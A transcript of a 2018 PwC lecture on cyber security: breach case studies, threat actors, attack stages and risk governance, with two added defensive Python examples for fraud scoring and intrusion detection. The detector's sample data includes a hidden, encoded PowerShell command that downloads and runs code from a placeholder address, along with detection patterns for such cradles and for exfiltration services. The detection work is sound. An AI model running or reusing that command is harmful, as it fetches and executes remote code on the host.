TRANSCRIPT
Industry Insight Lecture
Cyber Security
Thursday 19th April 2018
PwC Slide 2
In the next 60 minutes…

Outside of this room:
• 5 FTSE 250 organisations will suffer a cyber attack
• 4,000 hours of video will have been uploaded to YouTube
• 7,200 more people will have joined LinkedIn
• Several people will have used social media ill-advisedly and damaged their own or their employers’ reputation
• Several thousand devices will connect to the internet for the first time; by 2020 it is estimated that there will be over 20 billion devices connected to the internet

Inside this room, we’ll discuss:
1. A bit about me
2. Global Cyber Security Context
3. High Profile Cyber Security Breaches – and what we can learn
4. Typical cyber-attacks, emerging threats and cyber-enabled payment fraud
5. Mitigating the Threats and Risks in cyberspace – questions for us to ask ourselves
6. Q&A
Your Speaker
Paul Brady - PwC
Paul is a Director in PwC and leads PwC’s growing cyber security and data privacy practice in the North of England.
Paul’s background is in software development, coding for British Airways’ online initiatives in the late 1990s. He moved into public sector IT in 2001, working in health informatics for two years before spending four years implementing multi-agency information sharing solutions for public sector bodies in the North-East.
Paul moved to PwC in 2008. While managing security and controls on DWP’s Central Payment System (one of the world’s largest implementations of Oracle E-Business Suite, processing benefits and pensions payments in excess of £120bn per annum), Paul became a member of the CESG Listed Advisor Scheme (a CLAS consultant). This meant he was authorised to advise critical national infrastructure providers and public sector bodies on protectively marked information up to and including SECRET.
Paul is a full Member of the Institute of Information Security Professionals (M.Inst.ISP) and his team works with organisations across all sectors on cyber threat and vulnerability management, data privacy and GDPR (General Data Protection Regulation).
Paul will be leading a discussion on insights and lessons learned from some high profile data security breaches and cyber security incidents, using real world experience where he can (subject to client confidentiality constraints) and shining a professional light on some of the breaches that are in the public domain.
Context
Cyber Security Context – The world has changed…
We operate in a world where we don’t own the systems we use or control the data we rely on.

Digital Revolution: Cloud; “IoTs”; Big Data; Digital Currency
Growing Cyber Risk: Evolving Threats; More Connections; Talent Shortage; Arms Race
More Regulation

20th CEO Survey: 1,379 interviews completed; 2,900 Global PwC CEO panel members; 79 countries
Impacts of Cyber Crime
The costs fall into three groups: direct, indirect and intangible.

• Investigation & Remediation – £ms in third-party specialist fees; Maersk costs estimated at $300m+
• Regulatory Sanction – fines of up to 4% of global annual turnover for GDPR breaches
• Customer and Business Redress – $190 average cost per record (incl. lost business and reputational damage)
• Increased Cyber Insurance Premium – 3x increase for hacked organisations
• Customer Fraud – Tesco Bank paid out £2.5m to customers after cyber fraud losses
• Class Action Law Suit – 47k staff sue Sony for stolen data, with estimated pay-outs of over $8m
• Damage to Brand – harder to attract new customers
• Heads Roll – Equifax CEO and CIO lose their jobs
• Merger Value – $350 million reduction in the Yahoo takeover price by Verizon
What can we learn from high profile cyber security incidents and cyber-enabled fraud?
Threat actors, plotted on the slide by sophistication and motivation: Accidental; Malware (non-targeted); Cyber Terrorist; Organised Cyber Criminal; State-Sponsored Attacks; Competitor; Disgruntled ex-Employee; 3rd Party Provider; Hacker Hobbyist; Hacktivist; Disgruntled Customer; Insider.

High Profile Cyber Security Incidents
• £2.3m FSA fine for data loss (August 2010)
• Lulzsec & Anonymous targeted hacktivists (2012–2013)
• Edward Snowden discloses NSA and GCHQ spying programmes (June 2013)
• 110 million credit card details stolen (November 2013)
• $101m stolen through fraudulent payment instructions sent via SWIFT (February 2016)
• Panama Papers – 11.5m leaked documents (April 2016)
• 500m account details stolen from company database (September 2016)
• Widespread DDoS attack on upstream DNS provider (October 2016)
• Cyber-thieves stole £2.5m from 9,000 people (November 2016)
• $100m stolen through targeted phishing attacks (March 2017)
• WannaCry ransomware (May 2017)
Threat Landscape – A lot has happened in the last 18 months…
NSA leaks have accelerated the ‘democratisation of threats.’

• July 2016 – Internal breach affecting over 500,000 people
• August 2016 – Shadow Brokers release stolen NSA tools to the world*
• May 2017 – WannaCry ransomware disrupts 74 countries and major organisations
• June 2017 – NotPetya (a Petya variant that presented as ransomware but was in practice destructive: paying could not recover the files) takes multiple systems offline
• August 2017 – Over 2.4 million customers potentially infected with malware via a trojanised build of the popular tool CCleaner
• September 2017 – 143m customer details (potentially) stolen from Equifax, wiping a third off the value of the organisation
• September 2017 – SEC admits a breach in 2016 probably led to insider trading

* The release of the NSA tools by Shadow Brokers has put “nation state” tools in the hands of cyber criminals and organised crime. This has resulted in a major shift in the threat landscape for everyone.

Major impacts (and direct costs) include:
• Maersk not being able to dock ships and unload cargo ($275m+)
• Millions of FedEx (TNT) packages delayed ($300m+)
• A global shortage of critical drugs produced by Merck ($300m+)
What lessons can we learn from some of the incidents we’ve seen?
Tesco Bank – November 2016: customers lost £2.5m (apparently)
• Define what ‘suspicious or abnormal’ looks like; monitor transactions and anomalies; align counter-fraud and security operations
• Improve authentication: risk-based authentication, multi-factor authentication
• Educate customers on good practice, especially around usernames, passwords and phishing; have a social media strategy that sits alongside the security strategy, e.g. to coincide with containment or ‘pulling the plug’
• Deploy extra protection, e.g. 3D Secure technology such as Verified by Visa and MasterCard SecureCode, and CAPTCHA to defend against ‘bots’
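The first two bullets above, defining what ‘suspicious or abnormal’ looks like and letting that score drive risk-based authentication, in working form. This is an added example for this transcript, not Tesco Bank’s or PwC’s logic: the weights, thresholds, window sizes and every sample transaction are assumptions constructed for the illustration. It goes a little beyond the slide in combining per-card baselines (usual amount, countries seen) and velocity with a cross-card signal, one merchant charging many distinct cards inside a short window, which is what separates an attack on the bank from a single customer’s stolen card. The outcome is one of allow, step_up (challenge the customer out of band) or block (hold the payment for counter-fraud), and only allowed transactions are fed back into the baseline so that fraud cannot teach the model that it is normal.

```python
"""Added example (not Tesco Bank's or PwC's code): rule-based transaction risk
scoring driving risk-based authentication. Weights, thresholds and the sample
transactions below are assumptions constructed for this illustration."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from statistics import median

STEP_UP_THRESHOLD = 50           # assumed: require MFA / out-of-band confirmation
BLOCK_THRESHOLD = 80             # assumed: hold the payment and alert counter-fraud
VELOCITY_WINDOW = timedelta(minutes=10)
MASS_WINDOW = timedelta(minutes=15)
MASS_DISTINCT_CARDS = 10         # assumed: one merchant hitting this many cards is a campaign


class TransactionMonitor:
    def __init__(self):
        self.amounts = defaultdict(list)          # card -> amounts from allowed history
        self.countries = defaultdict(set)         # card -> countries seen in allowed history
        self.recent = defaultdict(deque)          # card -> timestamps inside VELOCITY_WINDOW
        self.merchant_cards = defaultdict(deque)  # merchant -> (ts, card) inside MASS_WINDOW

    def learn(self, card, amount, country):
        """Seed or extend what 'normal' looks like for a card."""
        self.amounts[card].append(amount)
        self.countries[card].add(country)

    def process(self, txn):
        """Score one transaction; returns (score, action, reasons)."""
        card, ts, merchant = txn["card"], txn["ts"], txn["merchant"]
        score, reasons = 0, []
        history = self.amounts[card]
        if history and txn["amount"] > 5 * median(history):
            score += 25
            reasons.append("amount over 5x the card's median")
        if txn["country"] not in self.countries[card]:
            score += 20
            reasons.append("first use in this country")
        if txn["cnp"]:
            score += 10
            reasons.append("card not present")
        if 1 <= ts.hour < 5:
            score += 10
            reasons.append("overnight")
        # Velocity: how many transactions on this card in the last 10 minutes.
        q = self.recent[card]
        q.append(ts)
        while ts - q[0] > VELOCITY_WINDOW:
            q.popleft()
        if len(q) >= 3:
            score += 20
            reasons.append(f"{len(q)} transactions in 10 min")
        # Cross-card signal: one merchant charging many distinct cards in 15 minutes.
        mq = self.merchant_cards[merchant]
        mq.append((ts, card))
        while ts - mq[0][0] > MASS_WINDOW:
            mq.popleft()
        distinct = {c for _, c in mq}
        if len(distinct) >= MASS_DISTINCT_CARDS:
            score += 40
            reasons.append(f"merchant hit {len(distinct)} cards in 15 min")
        if score >= BLOCK_THRESHOLD:
            action = "block"
        elif score >= STEP_UP_THRESHOLD:
            action = "step_up"
        else:
            action = "allow"
        if action == "allow":  # never let unconfirmed activity shift the baseline
            self.learn(card, txn["amount"], txn["country"])
        return score, action, reasons


def demo():
    """Constructed scenario: 12 UK cards with benign history, then an overnight
    burst in which one overseas merchant charges each card in turn."""
    mon = TransactionMonitor()
    cards = [f"card{i:02d}" for i in range(12)]
    for card in cards:
        for amount in (12.50, 38.00, 22.10, 55.00):
            mon.learn(card, amount, "GB")
    results = []
    # A usual-sized afternoon purchase at a home merchant: should be allowed.
    results.append(mon.process({"card": "card00", "ts": datetime(2016, 11, 4, 14, 0),
                                "amount": 30.0, "country": "GB",
                                "merchant": "grocer-GB", "cnp": False}))
    start = datetime(2016, 11, 5, 3, 0)
    for i, card in enumerate(cards):
        results.append(mon.process({"card": card, "ts": start + timedelta(seconds=30 * i),
                                    "amount": 350.0, "country": "BR",
                                    "merchant": "merchant-overseas-1", "cnp": True}))
    return results


if __name__ == "__main__":
    for score, action, reasons in demo():
        print(score, action, "; ".join(reasons))
```

In the constructed burst the first nine overseas charges score 65 (large, foreign, card-not-present, overnight) and are stepped up; from the tenth card onward the merchant-level signal adds 40 and the payments are blocked. Real deployments tune the weights from labelled fraud data and add the counter-fraud team’s own rules, but the structure is the point: a written-down definition of abnormal, a score, and an authentication decision that gets stricter as the score rises.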
TalkTalk – 15 and 21 October 2015: data theft affecting 157,000 individuals
• Scan for and address known vulnerabilities (web developers to harden code against common attacks); apply patches and fixes
• Complete due diligence in relation to acquisitions
• Implement detective and monitoring controls, focusing on confidentiality and integrity of data and not just availability
• Falling prey to amateur hackers invites strong regulatory action
• Prevention is cheaper than cure: £42m estimated cost of remediation
Financial Services Institution 1 – accidental DDoS, 2014; Financial Services Institution 2 – hacktivist disinformation; Financial Services Institution 3 – attacks following profile-raising activity
• Don’t assume you are not a target, and don’t assume you won’t be collateral damage in an attack targeting another organisation. E.g. a Chinese ‘APT’ (Advanced Persistent Threat) pointed a DDoS botnet at the wrong infrastructure / IP address range: an organisation with no real DDoS mitigation.
• Don’t believe the hackers: social media has been used to propagate falsehoods. Following a DDoS attack that took down an internet banking ‘app’ to create an availability issue for a bank, the hacktivists then falsely claimed to have taken data.
• Plan to adapt security to the potential impacts of market-facing activity; increase threat and attack monitoring during and after marketing campaigns that raise the organisational profile or increase the digital footprint / attack surface.
NHS – WannaCry ransomware, May 2017; Mossack Fonseca – Panama Papers, April 2016
Both the WannaCry ransomware that caused disruption and delays in the delivery of patient care in the NHS in the UK, and the confidentiality breach involving 11.5m documents being leaked from the law firm Mossack Fonseca (the ‘Panama Papers’), were as devastating and effective as they were because the attacks exploited the same two root-cause vulnerabilities:
• Out-of-date, vulnerable technology / software (not patched, or not upgraded to a more secure version); in WannaCry’s case the SMBv1 flaw used by the leaked EternalBlue exploit, for which Microsoft had released the MS17-010 patch two months before the outbreak; and
• A flat (or ‘global, flat’) network infrastructure, so the malware could fairly easily traverse the entire network and reach multiple computers once one computer had been compromised.
The lesson? Update and patch systems and have a containment or network segmentation strategy; have a pre-agreed approach to dealing with ransomware; and have a sensible timeframe for back-ups of data, with restores tested and at least one copy the malware cannot reach, because the ability to restore is what turns ransomware from a crisis into an outage.
Recurring Themes found Post-Incident

Awareness
• Phishing continues to be a successful strategy for attackers, who rely on poor staff awareness combined with gaps in an organisation’s patching or currency
• In particular, we continue to see increasing use of crypto-malware
• Users are often the last line of defence and it is important to put in place strong education and awareness programmes

Data
• The tendency for data to be copied and shared increases the ‘threat surface’
• Production data is being used in non-production environments where security controls are often less stringent
• Organisations need to understand where they store sensitive customer, commercial and staff data and ensure that it is handled appropriately and protected

Legacy
• While organisations often focus on deploying secure systems, we find a ‘blind spot’ when it comes to securing legacy estates
• Often legacy systems are built on insecure platforms or have been re-purposed in a way that exposes business systems
• Decommissioning of old systems is often not verified, leaving sensitive data exposed

Governance
• A lack of accountability for cyber security risks: senior executives and board members suggesting that it is solely an IT problem
• Lack of effective governance over security risks
• Identification and management of risks / critical assets is often fragmented and inconsistent

Culture
• ‘Defence in depth’ is often thought of as ‘expense in depth’
• In reality, many of the commodity threats can be mitigated by getting the basics right
Emerging cyber threats

1. Legitimate tools – Malware-free intrusions are becoming common, where VBS, PowerShell, psexec etc. are used instead.
2. Memory-only malware – Increasing use of malware which rarely touches disk, negating many detection techniques in enterprise networks.
3. Exfil via legit services – Rapid increase in data exfil via DropBox, CloudMe, MyDrive, Gmail drafts, or via compromised VPN access.
4. Targeted e-crime – Payment teams in organisations are being heavily targeted and require specific protection and training.
5. Social engineering – Increasing online or phone interaction between attackers and victims, with significant reconnaissance involved.

Related vectors: supply chains; strategic web compromises; spear phishing.
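Threats 1 to 3 above share a property: nothing malicious is written to disk, so file-based antivirus sees nothing and the evidence lives in process-creation and proxy telemetry instead. The following is an added example for this transcript, not PwC’s or any vendor’s detection content, showing the kind of heuristics a security operations team would run over that telemetry: encoded or hidden PowerShell, in-memory download cradles (checked against the decoded script, where attackers hide them), PsExec’s service executable, script hosts launched from user-writable paths, and large uploads to the personal cloud services the slide names. The record field names, the threshold and every sample event are constructed for the example. One caveat a practitioner will want: command-line heuristics miss a second stage pulled straight into memory from a clean-looking first hop, so the durable answer to memory-only tradecraft is PowerShell script block logging (Event ID 4104) and AMSI, which see the script after decoding regardless of how the command line was obfuscated.

```python
"""Added example (not PwC's code): heuristic detections for living-off-the-land
tooling, in-memory PowerShell payloads and bulk exfil to personal cloud services.
Field names, thresholds and all sample records are constructed for this example."""
import base64
import re
from dataclasses import dataclass

# Assumed: hostname suffixes of the services the slide names as exfil channels.
EXFIL_DOMAINS = ("dropbox.com", "cloudme.com", "mydrive.ch", "mail.google.com")
EXFIL_BYTES_OUT = 5 * 1024 * 1024  # assumed tuning value: flag single uploads >= 5 MiB

# Download-cradle / in-memory execution idioms common in PowerShell tradecraft.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadData|Invoke-Expression|\bIEX\b|FromBase64String"
    r"|Reflection\.Assembly\]::Load", re.IGNORECASE)
# -EncodedCommand and its abbreviations take a base64 blob of UTF-16LE script.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
STEALTH_RE = re.compile(r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r"\\(?:cscript|wscript|mshta)\.exe$", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(?:Temp|AppData|Downloads|Public)\\", re.IGNORECASE)


@dataclass
class Finding:
    event_id: str
    technique: str
    detail: str


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script if the flag is present and valid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def check_process(ev):
    """Inspect one process-creation event (assumed fields: id, image, cmdline)."""
    findings = []
    name = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    if name in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(Finding(ev["id"], "encoded PowerShell", decoded[:60]))
        # Look for cradles in the decoded script as well; that is where they hide.
        if CRADLE_RE.search(cmd if decoded is None else cmd + " " + decoded):
            findings.append(Finding(ev["id"], "in-memory download cradle", name))
        if STEALTH_RE.search(cmd):
            findings.append(Finding(ev["id"], "hidden window / no profile", name))
    if name == "psexesvc.exe" or "psexec" in cmd.lower():
        findings.append(Finding(ev["id"], "PsExec remote execution", ev["image"]))
    if SCRIPT_HOST_RE.search(ev["image"]) and USER_WRITABLE_RE.search(cmd):
        findings.append(Finding(ev["id"], "script host run from user-writable path", cmd))
    return findings


def check_proxy(rec):
    """Inspect one web proxy record (assumed fields: id, method, host, bytes_out)."""
    host = rec["host"].lower()
    if (rec["method"] in ("POST", "PUT")
            and any(host == d or host.endswith("." + d) for d in EXFIL_DOMAINS)
            and rec["bytes_out"] >= EXFIL_BYTES_OUT):
        return [Finding(rec["id"], "bulk upload to personal cloud service",
                        f"{host} {rec['bytes_out']} bytes")]
    return []


def run(process_events, proxy_records):
    findings = []
    for ev in process_events:
        findings.extend(check_process(ev))
    for rec in proxy_records:
        findings.extend(check_proxy(rec))
    return findings


def _encoded(script):
    """Build a -EncodedCommand blob the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry (not real data); 192.0.2.10 is a documentation address.
SAMPLE_PROCESS_EVENTS = [
    {"id": "p1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s')")},
    {"id": "p2", "image": r"C:\Windows\PSEXESVC.exe", "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"id": "p3", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice.vbs"'},
    {"id": "p4", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},  # benign admin script
]
SAMPLE_PROXY_RECORDS = [
    {"id": "w1", "method": "POST", "host": "content.dropbox.com", "bytes_out": 48_000_000},
    {"id": "w2", "method": "GET", "host": "www.dropbox.com", "bytes_out": 512},
    {"id": "w3", "method": "POST", "host": "mail.google.com", "bytes_out": 9_500_000},
]

if __name__ == "__main__":
    for f in run(SAMPLE_PROCESS_EVENTS, SAMPLE_PROXY_RECORDS):
        print(f"{f.event_id}: {f.technique} ({f.detail})")
```

Run against the constructed sample, the benign scheduled script (p4) and the small browse to Dropbox (w2) produce nothing, while the encoded cradle, the PsExec service, the script host in a temp directory and the two large uploads are each flagged. The upload rule is deliberately only a volume threshold on known hosts; a Gmail-drafts channel that never sends mail stays under it, which is why the slide lists it separately and why the real control for that channel is policy and CASB-style visibility rather than a byte count.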
Cyber-enabled Payment Fraud
What does a typical cyber attack look like? The majority of attacks target poor security behaviours by individuals to gain access.

Stage 1 – Reconnaissance (timescale: days to months)
Attacker gathers intelligence on the target organisation and its customers to refine their attack and increase their chances of success.
Tactics / techniques: social media analysis; digital footprinting; network scanning

Stage 2 – Infiltrate (hours to days)
Attacker tricks a user into executing malicious software to compromise their machine or gain unauthorised access to the network.
Tactics / techniques: targeted phishing emails; social engineering

Stage 3 – Embed & Orientate (weeks to months)
Attacker gains more access and installs tools to monitor systems and business processes, increasing the potential impact or financial rewards of their attack.
Tactics / techniques: privilege escalation; network traversal; passive monitoring

Stage 4 – Execute & Cover tracks (hours to days)
Attacker quickly executes the attack and then removes evidence in order to stop the target identifying the attacker and preventing future attacks.
Tactics / techniques: data extraction; financial fraud; denial of service (DoS)

By understanding what real attacks look like we can see that traditional vulnerability and penetration tests do not exercise all of an organisation’s controls. Red Team exercises go beyond technology and look at security behaviours, detective controls and response capability to provide a more rounded and context-rich view of your security.
PwC Global State of Information Security Survey – business impacts of security incidents
https://www.pwc.com/us/en/cybersecurity/information-security-survey.html
Business email compromise and ransomware emerge as growing business impacts, while phishing is the top vector. Respondents cite business email compromise as the leading impact of incidents, while phishing becomes the top vector of cybersecurity incidents.
(Question 22: “How was your organization impacted by the security incidents?”; Question 19: “How did the security incident(s) occur?”)

Impacts cited: business email compromise (the leading impact); ransomware implanted on systems; theft of “hard” intellectual property; theft of “soft” intellectual property; financial losses. Chart values as captured: 17%, 22%, 23%, 26%, 23%.
• Are investing in a security strategy for the Internet of Things
• 38% cite phishing attacks, making it the No. 1 attack vector for cybersecurity incidents this year
Business Email Compromise (Phishing and Spear Phishing)
• 33% of targets click on malicious phishing links
• 25% of spear-phishing targets become infected with malware
• 4%: the lowest response rate to a PwC mass phishing campaign
• 56%: the highest response rate to a PwC mass phishing campaign
Stopping all clicks is an impossible task.
PwC Global State of Information Security Survey – estimated likely source of incidents
https://www.pwc.com/us/en/cybersecurity/information-security-survey.html
(Question 21: “Estimated likely source of incidents”; not all factors shown.)
Third-party business partners are still the No. 1 source of security incidents: 41% of incidents are attributed to third-party business partners. Incidents attributed to insiders, including trusted third parties and employees, declined while those ascribed to outsiders inched up.*
Sources compared for 2015 and 2016: third-party business partners; current employees; former employees; unknown hackers; competitors. Chart values as captured: 44%, 34%, 21%, 23%, 41%, 29%, 23%, 26%, 29%, 28%.
* Trusted third parties include suppliers, business partners, and current and former suppliers, consultants and contractors.
Mitigating the Threats and Risks in cyberspace – Questions to ask ourselves
Understanding and Managing the Risks…

Key Risks
• Reputational Damage – loss of stored commercially sensitive information such as personally identifiable information, key company information or corporate IP.
• Financial Loss – loss of client assets due to compromise of payment feeds or information feeds used to perform financial trades and activity.
• Disruption of Digital Systems – loss of data (file stores / databases) and/or communication channels such as email and data feed services provided to clients.
• Loss of Competitive Advantage – leakage and exposure of sensitive information pertaining to the strategy of the business, e.g. mergers and acquisitions.

Threat Actors
• Nation State – economic, political and/or military advantage
• Hacktivists – political and social change; influencing corporate policies
• Organised Crime – immediate financial gain; collecting information for future financial gains
• Insider – deliberate sabotage of immediate employer; immediate and future financial gains

Methods of Attack
• External Network Compromise – hack into poorly configured external network devices to gain entry to the IT network.
• Malware / Social Engineering – target staff to gain access to their desktop as an initial foothold onto the IT network.
• Internal Network Access – exploit weak security controls to gain access to the internal IT network and servers.
• Denial of Service – deny access to internet-based services by flooding or disrupting online traffic.
• Unauthorised Access to Client Systems – indirect compromise and theft of client critical and sensitive information without permission.

Questions to ask
• Do we have the right skills (board, business leaders, digital innovators, CISO, functional leaders…)?
• Are we seeing the sorts of actions we should expect from management?
• How do we know whether these are sufficiently complete?
• Are the actions progressing fast enough?
• How do we know where we are on the journey?
Threat Trend – Are we getting any better?
99.9% of the vulnerabilities exploited in 2014 had been publicly known, with a CVE assigned, for more than a year, some of them as far back as 1999. (Source: Verizon DBIR 2015)
Threat Trend – Reading the Crystal Ball…
Managing cyber risk is a multi-faceted challenge…

Authenticating People
• Password retirement
• Biometrics – done right
• Who are ‘my people’?
• Strong federated authentication
• ‘Continuous authentication’

Validating Inputs
• Automated processes: ‘corrupt the process by corrupting inputs’
• Authenticating systems
• Validating critical inputs

Protecting Data
• Securing data is no longer synonymous with securing systems
• Data-centric approach to encryption
• Encryption everywhere

Fixing the Hard Basics
• IT architecture (Active Directory, network segmentation, virtualisation, internet first)
• Automated controls (e.g. patching)
• Access governance
• Data architecture
• Legacy

Anomaly Detection
• Holistic monitoring of people, process, technology and physical
• ‘Risk scoring’ interactions
• Focus on ‘verifying good’
• Automated responses

Culture
• Embedding cyber security in every decision
• Empowering every individual to secure the organisation

Resilient Business
• Processes that can continue when critical IT fails
• Processes that can recover quickly from technology failure
• Minimising single points of failure
• ‘Worst case’ recovery capability

Untrusted Apps
• Proliferation of apps
• Lack of control over the development environment
• Isolating the impact of malignant apps
• Automated compliance

Third Party Oversight
• Third-party attestations and audits are no longer good enough
• Operational oversight
• Real-time visibility of vulnerabilities and threats through the supply chain

Focus on managing risk to business processes, not securing kit. Moving away from the core. A different approach to controls. Quantifying risk. Impactful board governance. A clear understanding of threat and exposure.
A Check List for your Organisation
1. A real understanding of exposure
2. Holistic framework and approach
3. Appropriate capability and resource
4. Submit to independent review and test
5. Incident preparedness and a track record
6. Active community contribution
7. Considered approach to legal and regulatory environments
Enabling Boards to challenge themselves as to whether their response is adequate and evolving sufficiently rapidly as the risk develops.
https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/governing-cyber-security-risk.html
Questions

www.pwc.co.uk/cyber
This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this
publication without obtaining specific professional advice. No representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this
publication, and, to the extent permitted by law, PricewaterhouseCoopers LLP, its members, employees and agents do not accept or assume any liability, responsibility or duty of care for
any consequences of you or anyone else acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it.
© 2018 PricewaterhouseCoopers LLP. All rights reserved. In this document, “PwC” refers to the UK member firm, and may sometimes refer to the PwC network. Each member firm is a
separate legal entity. Please see www.pwc.com/structure for further details.